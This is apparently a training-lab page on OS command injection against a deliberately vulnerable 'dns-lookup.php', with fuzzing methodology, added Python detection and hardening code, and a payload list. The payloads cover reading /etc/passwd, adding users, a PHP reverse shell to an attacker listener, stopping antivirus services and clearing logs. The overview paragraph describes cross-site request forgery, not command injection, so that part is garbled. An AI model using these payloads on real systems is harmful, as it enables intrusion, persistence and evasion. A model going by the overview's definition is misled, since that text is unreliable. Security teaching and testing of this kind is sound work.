Command Injection (CMDi)
Overview

Command Injection may occur when an attacker is able to run script in a user's browser. To forge a legitimate request, the script creates and sends the same parameters to the target website that would be sent if the user had submitted the legitimate form themselves. The target website knows the request has come from the user's browser but cannot detect that the request was created and sent by a malicious script running in the user's browser. As far as the target site can tell, the user submitted the request by using the web site in the expected way.

Discovery Methodology

- Look for pages that appear to execute system commands, like ping, nslookup, traceroute or CGI scripts.
- Attempt to identify the operating system. For example, HTTP response vanity headers like x-powered-by, Server, x-aspnet-version, etc. may infer the operating system. Also look for clues such as: ASP.NET runs on Windows exclusively, and the IIS version is tied directly to the operating system version.
- Try to cause an error, since error messages often contain hints about the underlying operating system, such as the direction of the file path separators.
- Fuzz with command separators like ;, & and &&, depending on whether you are using Linux or Windows respectively.
- Fuzz with characters reserved in operating system shells:
  /bin/bash: ! # $ % & ' ( ) * + , - . / : ; < = > ? @ [ \ ] ^ _ { | } ~
  cmd.exe: % ^ & < > | ' ` , ; = ( ) ! " [ ] . * ?
- Also fuzz with non-alphanumeric ASCII characters and command injection values from FuzzDB.
- Some vulnerable pages may not produce explicit output. Two methods that may help detect command injection vulnerabilities in these cases are missing output and time-delay inference.
- When fuzzing for command injection, note when pages are missing output. In some cases an error caused by fuzzing for command injection may interrupt the normal flow of execution.
- Time-delay inference should be attempted with commands most users are allowed to execute and that cause a predictable delay. ping may work well because it runs in one-second increments and is executable by users on Windows and Linux against the loopback interface:
  Windows: ping -n 15 127.0.0.1
  Linux: ping -i 15 -c 2 127.0.0.1
- Try prefixing and suffixing the injection with chaining characters: ||, |, &&, &, `, <CRLF>, <LF>.
- Look for errors that are related to operating system errors, delays in responses which can be repeated by repeating the injection, or unexpected output in the response. The error may appear as an HTML comment.
- Attempt to determine the operating system type.

Reserved characters used in fuzzing for command injection

- &: Used to separate multiple commands on one command line. Runs the first command, then the second command.
- &&: Used to run the command following && only if the preceding command is successful.
- || (Windows): Used to run the command following || only if the preceding command fails. Runs the first command, then runs the second command only if the first command did not complete successfully.
- | (Linux): Redirects standard output of the first command to standard input of the second command.
- ( ): Used to nest commands.
- #: Command line comment symbol.

Exploitation

Inject operating system commands methodically. "ls" and "dir" are reasonably good commands to attempt since most user accounts will have permission to execute directory listings by default, and these two commands tend to be exclusive (Windows will not typically execute "ls" and Linux will typically not execute "dir", but this behavior absolutely varies). Prefix the injections with each of the reserved characters; then, for each prefix, suffix each injection as well.
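Detection logic for the chaining characters and time-delay primitives listed above, added here as an example and not part of the original page: it classifies sample values of a lookup parameter the way a WAF rule or a log review would. The names classify and scan are hypothetical, and the sample values are constructed.

```python
import re

# Constructed sample values of a target_host parameter, as a dns-lookup.php-style
# page would see them after URL decoding (not real captured traffic).
SAMPLE_VALUES = [
    "www.example.com",
    "www.example.com; ls -l",
    "127.0.0.1 && ping -n 15 127.0.0.1",
    "127.0.0.1 | cat /etc/passwd",
    "`whoami`",
    "www.example.com\nid",
    "mail-01.example.com",
]

# Chaining characters from the discovery methodology: || | && & ` ; <CRLF> <LF>,
# plus $( ), which bash expands the same way as backticks.
CHAIN_RE = re.compile(r"\|\||&&|[;&|`\r\n]|\$\(")
# Time-delay primitives: ping with a count/interval flag (the loopback trick
# above) or sleep. A delay that repeats with the request is the blind signal.
DELAY_RE = re.compile(r"\bping\s+-[nic]\s+\d+|\bsleep\s+\d+", re.IGNORECASE)


def classify(value):
    """Return the reasons a parameter value looks like an injection attempt."""
    reasons = []
    if CHAIN_RE.search(value):
        reasons.append("chaining-character")
    if DELAY_RE.search(value):
        reasons.append("time-delay-primitive")
    return reasons


def scan(values):
    """Map each suspicious value to its reasons; clean values are omitted.
    Decode URL encoding first, or %0A and %26 will slip past CHAIN_RE."""
    findings = {}
    for value in values:
        reasons = classify(value)
        if reasons:
            findings[value] = reasons
    return findings


if __name__ == "__main__":
    for value, reasons in scan(SAMPLE_VALUES).items():
        print(repr(value), "->", ", ".join(reasons))
```

Run the values through the application's own URL decoding before scanning, because a raw query string splits on & and hides %0A as text.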
Examples

Examples for page "dns-lookup.php":

Recon: Discover available functionality using provided help
  Windows XP: && help
  Linux: && <cmd> --help
  Linux: && man <cmd>
Recon: Determine current directory
  Windows XP: && dir
  Linux: && pwd
Recon: Chain commands to discover directory structure
  Windows XP: && cd ../../.. && dir
  Linux: && cd ../../.. && ls -l
Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc.
  Windows XP: && ipconfig /all
  Linux: && ifconfig
Scanning: Discover hosts on network
  Windows XP: && ping -n 1 192.168.56.102
  Linux: && ping -c 1 192.168.56.102
Scanning: Enumerate current user
  Windows XP: && set
  Linux: && whoami
Scanning: Enumerate users
  Linux: & cat /etc/passwd
Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups
  Windows XP: && net view [/domain]
  Windows XP: && net user [/domain]
  Windows XP: && net localgroup [/domain]
Gaining Access: Add user
  Windows XP: && net user <username> /add
  Linux: useradd <username>
Gaining Access: Delete user
  Windows XP: && net user <username> /delete
Gaining Access: Reverse Bash shell
  Linux: Determine the IP address of the attacking host. Set up a listener on the attacker host, such as nc -l -p 1234. Once the listener is set up, ask the web application server to connect back to the attacker host. Set the IP address appropriately.
  www.google.com;php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Maintain Access: Kill AV
  net stop <av process>
Maintain Access: Kill AV/protective services or open backdoor services
  Windows XP: && net stop <service name>
  Windows XP: && net start telnet
  Windows XP: && net stop telnet
Cover Tracks: Clear logs
  Windows XP: && wevtutil cl

Videos

- Command Injection Explained - Part 1: The Basics
- Command Injection Explained - Part 2: Discovery
- Command Injection Explained - Part 3: Blind Injection
- Command Injection Explained - Part 4: Chaining Commands
- Command Injection Explained - Part 5: Shell
- Command Injection Explained - Part 6: Directory Traversal
- Command Injection to Dump Files, Start Services, and Disable Firewall
- How to Locate the Easter Egg File using Command Injection
- Gaining Administrative Shell Access via Command Injection
- Using Command Injection to Gain Remote Desktop
- Solving Password Challenge in Mutillidae with Command Injection
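The hardened counterpart to the "dns-lookup.php" pattern the examples above target, written as an added Python example (not Mutillidae's own code, which is PHP): the lookup parameter is checked against a hostname allow-list and handed to nslookup as an argv list so that no shell ever parses the chaining characters from the discovery section. The names unsafe_command, build_lookup_argv, run_lookup and quoted_command are hypothetical.

```python
import re
import shlex
import subprocess

# Allow-list for what a DNS lookup page should accept: an RFC 1123 hostname
# (labels of letters, digits and hyphens joined by dots). \Z rather than $ so a
# trailing newline cannot sneak through.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\Z",
    re.IGNORECASE,
)


def is_safe_hostname(value):
    return HOSTNAME_RE.match(value) is not None


def unsafe_command(target_host):
    """The vulnerable pattern: the parameter is spliced into a shell string, so
    every chaining character listed above is interpreted by /bin/sh or cmd.exe."""
    return "nslookup " + target_host  # would be run with shell=True


def build_lookup_argv(target_host):
    """Validate against the allow-list, then hand nslookup an argv list. With no
    shell involved, ; & | ` and newlines carry no special meaning."""
    if not is_safe_hostname(target_host):
        raise ValueError("target_host is not a valid hostname")
    return ["nslookup", target_host]


def run_lookup(target_host, timeout=5):
    """Execute the validated lookup without a shell (shell=False is the default).
    The timeout also bounds the time-delay probing described above."""
    argv = build_lookup_argv(target_host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout)


def quoted_command(target_host):
    """Defence in depth if a shell string is unavoidable: shlex.quote makes the
    whole value one literal word, so an injected ';id' stays part of the name."""
    return "nslookup " + shlex.quote(target_host)
```

Reject-and-log on a failed allow-list check, since a value with a separator in it is the same signal the discovery section tells a tester to look for.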